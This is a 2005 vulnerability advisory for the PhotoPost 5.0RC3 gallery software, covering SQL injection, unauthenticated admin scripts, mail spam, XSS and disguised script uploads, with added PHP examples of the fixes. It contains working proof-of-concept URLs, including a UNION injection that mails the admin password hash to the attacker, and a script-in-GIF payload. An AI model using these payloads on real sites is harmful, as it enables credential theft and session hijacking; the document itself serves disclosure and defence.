
photopost50rc3.txt

Posted Mar 15, 2005
Authored by Igor Franchuk

PhotoPost 5.0RC3 is susceptible to SQL injection, arbitrary file upload, cross site scripting, and various manipulation flaws.

tags | exploit, arbitrary, xss, sql injection, file upload
SHA-256 | 0b6ed983b076ee2d4747a046aec2414e2cdc85fe6b5b11e5af9bf5f2cb0512b8

  PhotoPost 5.0RC3, All Enthusiast, Inc., multiple vulnerabilities

March 05 2005

For your consideration.

1. BACKGROUND
PhotoPost is popular commercial image-publishing software. From the vendor's own description:
Everyone loves showing off their photos! Add PhotoPost to your site, or let us install it for you,
and your visitors will be able to upload their photos to galleries on your site and interact in photo
discussions. Join the 3,500+ sites that are already using PhotoPost and add a fun new dimension to your website.
....
Yeah, it is just that bad.

2. IMPACT
A series of vulnerabilities allows a remote attacker
- to get arbitrary data from PhotoPost tables (*)
- to spam the administrator's mailbox
- to steal sessions
- to manipulate photographs
- to inject arbitrary HTML and script into PhotoPost pages (XSS)
- to upload "image" files with arbitrary content
(*) only under some configurations; described in detail below

3. SEVERITY
HIGH

4. ANALYSIS

4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES
PhotoPost (PP from here on) is built on a highly risky principle:
filtering of input data is left to PHP's magic_quotes setting:
=------
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NUL's are escaped with a backslash automatically.
=------
A large percentage of PP users never turn magic_quotes on.
It is a bad idea to rely on the user for something as essential as
data filtering; the application should escape its own query parameters
with mysql_escape_string/mysql_real_escape_string instead. A few lines
of native code would have removed that "human" factor entirely.
Many users have no idea what magic_quotes is, what it is for, or where
their negligence will lead them, even despite the warning PP gives
during installation. Looking at the architecture PP is assembled upon,
it becomes clear that PP should not even attempt to install itself on
systems with magic_quotes turned off.

PROOF of CONCEPT
To see whether PP is running in an environment with magic quotes
turned off, one can request the following URL (query (I) below):
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@host.zone",%20concat(username,"%20",%20password)%20from%20users
no login required

* replace yourmail@host.zone with your own e-mail address. If magic
quotes are turned off you will get the admin user name and MD5 password
hash by mail.

* the table name in the UNION has to match the installation's configured
table prefix (pp_db_prefix, see 4.2); the URL above assumes an empty prefix.

* this URL may not work if the site runs an old MySQL version:
=---
UNION is used to combine the result from many SELECT statements into one result set. UNION is available from MySQL 4.0.0 on
.....
=---
Because mysql_query() refuses stacked queries separated by ';', UNION
is the most practical way to pull data out through a single PHP-issued
SELECT. It was clever of the PHP developers not to allow multiple
queries divided by ';'.

QUICK FIX
.htaccess
php_value magic_quotes_gpc 1
(php_value in .htaccess only takes effect under Apache with mod_php and
AllowOverride enabled for that directory; it does nothing when PHP runs
as CGI/FastCGI, where the setting belongs in php.ini.)


4.2 CODING NEGLIGENCE
Analysis of query (I) leads straight to another security
issue with PP. It has plenty of unsafe queries like

"SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users WHERE userid=$uid"

Notice that the database field userid is compared with $uid.
$uid is supplied by the user, so its content is arbitrary, and yet
there are no quotes around it and no is_alpha or intval check,
nothing of the kind. Because the value sits in a numeric context,
escaping quote characters (which is all magic_quotes does) is no
protection by itself: a payload that contains no quotes passes
through untouched. Looking at the code at random shows that PP does
check from time to time, but the rule is not universal.

This is also why query (I) works: its UNION supplies three columns to
match joindate, email and username, so the attacker's address lands in
the email field the rpwd mail is sent to, and the concatenated user
name and password hash land in the username field that is written
into the message.

Even if magic_quotes were turned on it might be possible to devise a
query that passes through, one way or another, and gets the data
mailed to you anyway. But example query (I) won't do it; it is
constructed only to pass the several conditions that stand before
'send' is invoked.

QUICK FIX
1) .htaccess
php_value magic_quotes_gpc 1
It will at least make it more difficult.
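The following PHP script is an added example, not PhotoPost code, showing why quote escaping (all magic_quotes does) leaves the unquoted numeric parameter above open, and what the missing check looks like. The helper names, the 'pp_' prefix and the payloads are this example's own; query (I) is reproduced only in shape.

```php
<?php
// Added example (not PhotoPost code): why escaping alone does not protect an
// unquoted numeric parameter, and what the check should look like.
// The table prefix 'pp_' and the column names follow the advisory's query;
// the helper names are this example's own.

// What magic_quotes_gpc / addslashes() does to a GET/POST/Cookie value.
function magic_quotes(string $value): string {
    return addslashes($value);
}

// Vulnerable pattern from the advisory: $uid dropped into a numeric context.
function query_vulnerable(string $uid): string {
    $prefix = 'pp_';
    return "SELECT joindate,email,username FROM {$prefix}users WHERE userid=$uid";
}

// Hardened pattern: the parameter must be a plain unsigned integer.
// Rejecting instead of silently casting keeps "0 union ..." from becoming 0
// without anyone noticing.
function query_fixed(string $uid): string {
    $prefix = 'pp_';
    if ($uid === '' || !ctype_digit($uid)) {
        throw new InvalidArgumentException('uid must be an unsigned integer');
    }
    $id = (int) $uid;
    return "SELECT joindate,email,username FROM {$prefix}users WHERE userid=$id";
}

$benign = '42';
// Constructed payloads: the first has the shape of query (I) and uses quotes,
// so magic_quotes breaks it; the second uses none and survives escaping.
$quoted   = '0 union select "0","attacker@example.test",concat(username," ",password) from pp_users';
$unquoted = '0 union select 1,2,3 from pp_users';

foreach ([$benign, $quoted, $unquoted] as $input) {
    $escaped = magic_quotes($input);
    echo "input   : $input\n";
    echo "escaped : $escaped\n";
    echo "vuln    : " . query_vulnerable($escaped) . "\n";
    try {
        echo "fixed   : " . query_fixed($input) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "fixed   : rejected (" . $e->getMessage() . ")\n";
    }
    echo "\n";
}
```

Run it with `php` on the command line; no database is needed because only the generated SQL is shown. The quoted payload comes out with `\"` in it and would be a MySQL syntax error, which is exactly the author's point about magic_quotes, while the unquoted one reaches the vulnerable query unchanged. The same result is obtained more robustly with mysqli or PDO prepared statements binding $uid as an integer.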

4.3 SPAMMING THE ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT
PP doesn't always check whether the user is authorized. In this
particular case there is a login attempt, but the script never
acts on its result.

The other problem is that PP does not care at all how many events
are served (mail sending, say), how often, or how many authorization
attempts were made. This lack of policy, combined with the missing
check, leads to spam.

PROOF of CONCEPT
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1
no login required

Using this URL one may send an arbitrary number of messages to the
administrator's e-mail and PP won't even try to stop it.

QUICK FIX
adding

if ($User['userid'] == "") {
    diewell( $Globals['pp_lang']['noreg'] );
}

after authenticate() is invoked in the if ($action == "reportpost")
section should fix the problem with unauthorized users.

But it won't fix the problem in general: anyone who is
authorized will still be able to spam the administrator.


4.4 MANIPULATING USER PHOTOGRAPHS
The problem is in adm-photo.php: unlike all the other administrator
scripts it doesn't require "adm-inc.php". adm-inc.php has a built-in
check that won't let anybody except the administrator pass further.
That omission opens the set of administrator functions built into
adm-photo.php to everyone.

As an example I decided to construct a URL that would rebuild the
thumbnails for a picture with a given PID (in our case it is 1),
namely, it will rotate it clockwise.

PROOF of CONCEPT
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw
no login required
(PHP keeps only the last value of a repeated query parameter, so
$_GET['dowhat'] here is rotateccw.)

I'm not sure it is not one of the "features", but it looks like
no one but the admin should be allowed to do this job.

QUICK FIX
I believe adding
require "adm-inc.php";
will solve the problem.


4.5 INSERTING ARBITRARY HTML CODE

XSS1

And finally, there is XSS in PP. The tag filter:

function check_tags($data, $allowed){
    // /e evaluates the replacement as PHP code for every <...> match
    $data = preg_replace("/<(.*?)>/e",
        "process_tag(stripslashes('\\1'), \$allowed)",
        $data);
    // a case-sensitive replacement of one literal string is the whole URL check
    $data = str_replace('javascript:','#',$data);
    return $data;
}

I won't comment on it. Checking for the literal string javascript:
is a very, very bad habit.

In short, it is possible to form data such that PP will accept a
given URL, and then "check" it for javascript using this lame rule.

XSS2
PP doesn't check the biography field ('editbio') in the user profile,
so it can contain arbitrary HTML, tags and javascript; when the
personal information is viewed, the session might be stolen.

QUICK FIX
None
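As an added example (not PhotoPost code), the PHP script below puts the advisory's literal str_replace('javascript:') check beside a scheme allowlist that decodes entities and strips the whitespace browsers ignore before deciding. The function names and the attribute values it is run on are constructed for this example.

```php
<?php
// Added example (not PhotoPost code): a literal, case-sensitive replacement of
// "javascript:" versus a scheme allowlist. Helper names are this example's own.

// The advisory's approach, reduced to the one line that matters.
function filter_literal(string $url): string {
    return str_replace('javascript:', '#', $url);
}

// Hardened: decode what the browser would decode, drop the control/space
// characters browsers ignore inside a scheme, then accept only a short
// allowlist of schemes (or a relative URL). Anything else becomes '#'.
// The result is escaped for use inside a double-quoted HTML attribute.
function filter_allowlist(string $url): string {
    $decoded = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $probe   = preg_replace('/[\x00-\x20]+/', '', $decoded);
    if (preg_match('/^([a-z][a-z0-9+.-]*):/i', $probe, $m)) {
        $scheme = strtolower($m[1]);
        if (!in_array($scheme, ['http', 'https', 'mailto'], true)) {
            return '#';
        }
    }
    // No scheme (relative URL) or an allowed one: keep it, but escape for HTML.
    return htmlspecialchars($decoded, ENT_QUOTES, 'UTF-8');
}

// Constructed test inputs; the last four all slip past the literal check.
$cases = [
    'http://example.test/photo.gif',
    'photos/1.gif',
    'javascript:alert(1)',
    'JavaScript:alert(1)',
    "java\tscript:alert(1)",
    '&#106;avascript:alert(1)',
    'data:text/html,<script>alert(1)</script>',
];

foreach ($cases as $url) {
    printf("%-44s literal => %-44s allowlist => %s\n",
        json_encode($url, JSON_UNESCAPED_SLASHES),
        filter_literal($url),
        filter_allowlist($url));
}
```

Run it with `php`. Only the exact lower-case `javascript:` is caught by the literal check; the mixed-case, tab-separated and entity-encoded variants and the `data:` URL go straight through, while the allowlist rejects all of them and keeps the http and relative URLs. The biography field from XSS2 needs the same treatment on every tag and attribute it allows, not just on URLs.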

4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT

PP allows any file to be uploaded disguised as an image. It neither
checks the file content nor normalises it to some internal standard.
Basically, one uploads JS as an image into PP and then spreads a
DIRECT link to the uploaded "image". IE will execute the JS from the
broken image transparently (it sniffs the content and renders it as
HTML regardless of the .gif extension).

PROOF OF CONCEPT
injected.gif
<script>
document.write('<img src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');
alert('Injected');
</script>

PP SHOULD load every uploaded image 'as a picture' and then, on
success, save it 'as a picture' to guarantee that the stored file
content is at least image/gif.

QUICK FIX
None
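The "load as a picture, then save as a picture" check the advisory asks for, written as an added PHP example (not PhotoPost code) on top of the GD extension, which it assumes is installed. The function name and the two inputs, the advisory's injected.gif and a constructed 1x1 GIF, are this example's own.

```php
<?php
// Added example (not PhotoPost code): decode the upload through GD and store
// only the re-encoded result, so whatever was appended or disguised is gone.
// Assumes the GD extension is available. Helper name is this example's own.

function reencode_image(string $bytes): ?string {
    // Cheap first filter: header and magic bytes must look like an image.
    $info = @getimagesizefromstring($bytes);
    if ($info === false) {
        return null;
    }
    // Real decode; anything that is not actually an image fails here.
    $im = @imagecreatefromstring($bytes);
    if ($im === false) {
        return null;
    }
    // Re-encode as GIF (the advisory's image/gif): the output is freshly
    // written pixel data, so script, comments or trailing payload are dropped.
    ob_start();
    $ok  = imagegif($im);
    $out = ob_get_clean();
    imagedestroy($im);
    return $ok ? $out : null;
}

// Constructed inputs: the advisory's injected.gif (HTML, not an image) and a
// genuine 1x1 transparent GIF.
$injected = "<script>alert('Injected');</script>";
$realGif  = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');

foreach (['injected.gif' => $injected, 'pixel.gif' => $realGif] as $name => $data) {
    $stored = reencode_image($data);
    if ($stored === null) {
        echo "$name: rejected, not decodable as an image\n";
    } else {
        printf("%s: accepted, %d bytes after re-encoding, header %s\n",
            $name, strlen($stored), substr($stored, 0, 6));
    }
}
```

Run it with `php`; injected.gif is rejected and pixel.gif comes back as a new GIF stream starting with GIF89a. Serving the stored files from a path that only ever contains re-encoded output, with an explicit image Content-Type, removes what the IE sniffing in the PoC relies on.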

5. VENDOR STATUS

Informed a week ago by mail. No response.
Next time, if I have time to explore the sources again, I will not inform this
particular vendor. When this article was posted on the private PP forum
it was removed almost immediately.

Today I got a letter (not personal) about a new 5.01 release. Looking
at the fixed files, I saw that it really does fix some of the issues with PP
described in this article. In particular, the e-mail bypass
will not work in 5.01 under any conditions.

I believe you may easily find the vulnerable versions, as well as
some of the source code :-), with google.com


--
Best regards